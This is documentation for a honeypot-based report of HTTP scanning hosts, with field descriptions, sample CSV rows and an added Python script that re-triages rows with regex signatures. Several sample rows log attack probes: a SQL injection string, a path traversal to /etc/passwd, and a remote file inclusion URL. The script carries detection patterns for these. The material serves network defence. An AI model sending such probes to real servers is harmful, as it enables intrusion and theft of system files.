HTTP Scanners Report

This report identifies hosts that have been observed performing HTTP-based scanning activity.

HTTP scanning may be a benign activity — for example, it may be a search engine indexing the web, a research project, or an organization like the Shadowserver Foundation looking for open or vulnerable services that it can report to National CERTs and network owners so that they can remediate their networks.

Other scans, however, may be part of network reconnaissance in the preparatory phase of an attack. The scan itself may also carry out an attack, such as an SQL injection, a Remote File Inclusion (RFI) or Local File Inclusion (LFI) attempt, or an exploit for a specific vulnerability. Quite often, scanning activity comes from a botnet that is actively looking for new sites or devices to infect.

Below is a description of the report, which is based on data collected by SISSDEN HTTP-aware honeypots. In addition to recording the source of the scan, the honeypot logs the scan request in raw form and attempts to match it against known request patterns. Where a malicious artifact was collected by the honeypot, its MD5 and SHA256 hashes are also recorded (the file_md5 and file_sha256 fields). This information can support a CSIRT investigation into an incident and help determine its true nature.

This report type was created as part of the EU Horizon 2020 SISSDEN Project.

Fields

  • timestamp
    Time the scan was observed, in UTC+0
  • ip
    The IP address performing the scan
  • port
    The source port used in the scan
  • asn
    ASN announcing the scanning IP
  • geo
    Country where the scanning IP resides
  • region
    State / Province / Administrative region where the scanning IP resides
  • city
    City where the scanning IP resides
  • hostname
    PTR record of the scanning IP
  • type
    Type of activity observed; i.e. http-scan
  • dst_ip
    The IP address of the target device
  • dst_port
    Destination port used in the scan
  • dst_asn
    ASN announcing the target IP
  • dst_geo
    Country where the target IP resides
  • dst_dns
    FQDN of the target, if applicable and recorded
  • naics
    North American Industry Classification System Code of the scanning IP
  • sic
    Standard Industrial Classification System Code of the scanning IP
  • sector
    Sector to which the scanning IP belongs
  • dst_sector
    Sector to which the target IP belongs
  • public_source
    Source of the data, for cases where the source accepts being credited
  • sensorid
    ID of the sensor (target device) that observed the scan
  • pattern
    Request pattern recognized by the target sensor, if any (e.g. rfi, lfi, sqli); unknown when no pattern matched
  • url
    URL being requested by the scanning IP
  • file_md5
    MD5 hash of file downloaded, if any
  • file_sha256
    SHA256 hash of file downloaded, if any
  • request_raw
    Raw request (request line and headers) sent by the scanning IP; CRLF line breaks are escaped as \r\n in the CSV

Sample

timestamp,ip,port,asn,geo,region,city,hostname,type,dst_ip,dst_port,dst_asn,dst_geo,dst_dns,naics,sic,sector,dst_sector,public_source,sensorid,pattern,url,file_md5,file_sha256,request_raw
"2018-08-29 00:00:05",198.51.100.5,52513,27668,EC,AZUAY,CUENCA,198-51-100-5.example.net,http-scan,203.0.113.6,80,17169,AT,,0,0,,,SISSDEN,53c1549f-f806-4b82-8b3a-6673456cd40f,unknown,/,,,"GET / HTTP/1.1\r\nHost: 203.0.113.6\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
"2018-08-29 00:04:08",198.51.100.3,33418,23033,US,WASHINGTON,EVERETT,,http-scan,203.0.113.217,80,56630,RU,,0,0,Communications,,SISSDEN,5800ff5d-277e-48aa-b904-0997a00c6a37,unknown,/axis-cgi/aol%2A/_do/rss_popup?blogID=,,,"GET /axis-cgi/aol%2A/_do/rss_popup?blogID= HTTP/1.1\r\nAccept: */*\r\nAccept-Charset: utf-8;q=0.7,iso-8859-1;q=0.2,*;q=0.1\r\nHost: 203.0.113.217\r\nUser-Agent: Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
"2018-08-29 01:27:53",198.51.100.100,62868,36903,MA,SOUSS-MASSA-DRAA,AGADIR,,http-scan,203.0.113.200,80,203525,RO,,0,0,,,SISSDEN,2447a8e1-237d-4d37-b09f-23f6f30e58c2,sqli,/cgi-bin/perl/index3.php?destino=%22%20and%20%22x%22%3D%22y,,,"GET /cgi-bin/perl/index3.php?destino=%22%20and%20%22x%22%3D%22y HTTP/1.1\r\nAccept: */*\r\nConnection: Close\r\nHost: 203.0.113.200\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
"2018-08-29 16:23:32",198.51.100.105,32886,29238,AL,DURRES,DURRES,host105.example.com,http-scan,203.0.113.215,80,16276,EG,,0,0,,Other,SISSDEN,12b9d177-0eb5-4324-8e48-5ed5b868b9f4,lfi,/jaf/index.php?show=../../../etc/passwd,,,"GET /jaf/index.php?show=../../../etc/passwd HTTP/1.1\r\nAccept-Encoding: identity\r\nConnection: close\r\nHost: recitepoke.date\r\nUser-Agent: fimap.googlecode.com/v1.00_svn (My life for Aiur)"
"2018-08-29 23:58:40",198.51.100.170,20563,37963,CN,,HANGZHOU,,http-scan,203.0.113.217,80,55720,MY,,0,0,Communications,Communications,SISSDEN,112ded91-f0be-447f-b93d-5a18522b84ea,unknown,/wpo.php,,,"GET /wpo.php HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\nHost: 203.0.113.217\r\nUser-Agent: Mozilla/5.0"
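The following is an added example and is not part of the Shadowserver report documentation or of the SISSDEN honeypot code. It reads rows in the CSV layout above, splits request_raw on the escaped CRLF, percent-decodes the request target and applies its own narrow LFI/RFI/SQLi signatures, so that rows the sensor labelled unknown can be re-triaged and a disagreeing sensor pattern can be spotted. The signatures, the function names (parse_request_raw, classify, load_report, triage, summarize) and the embedded sample rows are all constructed for illustration: documentation addresses, shortened User-Agent strings, an example.org Host header, and one RFI-style row carrying a sensor pattern of unknown.

```python
"""Parse HTTP Scanners Report rows and re-triage them with local heuristics."""
import csv
import io
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample rows in the report's CSV layout (not copied from a live feed).
# request_raw carries CRLF as the two literal characters backslash-r backslash-n.
SAMPLE_CSV = r'''timestamp,ip,port,asn,geo,region,city,hostname,type,dst_ip,dst_port,dst_asn,dst_geo,dst_dns,naics,sic,sector,dst_sector,public_source,sensorid,pattern,url,file_md5,file_sha256,request_raw
"2018-08-29 00:00:05",198.51.100.5,52513,27668,EC,AZUAY,CUENCA,198-51-100-5.example.net,http-scan,203.0.113.6,80,17169,AT,,0,0,,,SISSDEN,53c1549f-f806-4b82-8b3a-6673456cd40f,unknown,/,,,"GET / HTTP/1.1\r\nHost: 203.0.113.6\r\nUser-Agent: Mozilla/5.0"
"2018-08-29 01:27:53",198.51.100.100,62868,36903,MA,SOUSS-MASSA-DRAA,AGADIR,,http-scan,203.0.113.200,80,203525,RO,,0,0,,,SISSDEN,2447a8e1-237d-4d37-b09f-23f6f30e58c2,sqli,/cgi-bin/perl/index3.php?destino=%22%20and%20%22x%22%3D%22y,,,"GET /cgi-bin/perl/index3.php?destino=%22%20and%20%22x%22%3D%22y HTTP/1.1\r\nAccept: */*\r\nConnection: Close\r\nHost: 203.0.113.200\r\nUser-Agent: Mozilla/4.0"
"2018-08-29 16:23:32",198.51.100.105,32886,29238,AL,DURRES,DURRES,host105.example.com,http-scan,203.0.113.215,80,16276,EG,,0,0,,Other,SISSDEN,12b9d177-0eb5-4324-8e48-5ed5b868b9f4,lfi,/jaf/index.php?show=../../../etc/passwd,,,"GET /jaf/index.php?show=../../../etc/passwd HTTP/1.1\r\nConnection: close\r\nHost: www.example.org\r\nUser-Agent: fimap.googlecode.com/v1.00_svn"
"2018-08-29 23:58:40",198.51.100.170,20563,37963,CN,,HANGZHOU,,http-scan,203.0.113.217,80,55720,MY,,0,0,Communications,Communications,SISSDEN,112ded91-f0be-447f-b93d-5a18522b84ea,unknown,/wpo.php?f=http://198.51.100.9/x.txt,,,"GET /wpo.php?f=http://198.51.100.9/x.txt HTTP/1.1\r\nHost: 203.0.113.217\r\nUser-Agent: Mozilla/5.0"
'''

# Deliberately narrow heuristic signatures (constructed for this example), applied to
# the percent-decoded request target. Order matters: the first match wins.
SIGNATURES = (
    ("lfi", re.compile(r"(\.\./){2,}|/etc/passwd\b|/proc/self/environ\b", re.I)),
    ("rfi", re.compile(r"[?&][^=&]*=\s*(?:https?|ftp)://", re.I)),
    ("sqli", re.compile(r"""['"]\s*(?:or|and)\s+|\bunion\s+select\b|\bsleep\s*\(""", re.I)),
)


def parse_request_raw(raw):
    """Split the escaped request into (method, target, version, headers)."""
    lines = raw.split("\\r\\n")  # the report escapes CRLF, so split on the escape, not on real CRLF
    parts = lines[0].split(" ", 2)
    if len(parts) != 3:
        raise ValueError("malformed request line: %r" % lines[0])
    method, target, version = parts
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, version, headers


def classify(target):
    """Return the first heuristic that fires on the decoded target, else 'unknown'."""
    decoded = unquote(target)
    for name, rx in SIGNATURES:
        if rx.search(decoded):
            return name
    return "unknown"


def load_report(text):
    """Parse the CSV and enrich each row with parsed headers and local verdicts."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        method, target, _version, headers = parse_request_raw(row["request_raw"])
        row["method"] = method
        row["headers"] = headers
        row["heuristic"] = classify(target)
        # A Host header that is neither the sensor IP nor its FQDN points at a scanner
        # walking a hostname list rather than an IP range; that changes target attribution.
        host = headers.get("host", "").split(":")[0]
        row["host_mismatch"] = host not in (row["dst_ip"], row["dst_dns"])
        # Hash fields are populated only when the honeypot actually captured a file.
        row["has_artifact"] = bool(row["file_sha256"])
        rows.append(row)
    return rows


def triage(rows):
    """Rows where the sensor pattern and the local heuristic disagree (worth a manual look)."""
    return [r for r in rows if r["pattern"] != r["heuristic"]]


def summarize(rows):
    """Counts of sensor patterns and of heuristic verdicts, for a quick side-by-side."""
    return Counter(r["pattern"] for r in rows), Counter(r["heuristic"] for r in rows)


if __name__ == "__main__":
    report = load_report(SAMPLE_CSV)
    sensor, local = summarize(report)
    print("sensor patterns:   ", dict(sensor))
    print("heuristic verdicts:", dict(local))
    for r in triage(report):
        print("review:", r["ip"], "->", r["dst_ip"], r["url"],
              "sensor=%s heuristic=%s host_mismatch=%s" % (r["pattern"], r["heuristic"], r["host_mismatch"]))
```

Run as a script it prints the sensor-versus-heuristic counts and lists the rows to review. The sensor's pattern field remains the authoritative label; the heuristics are intentionally narrow and exist only to surface rows worth a manual look, such as an unknown row whose query string fetches a remote URL. Split on the literal escape rather than on a real CRLF, since the CSV never contains the control characters themselves.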
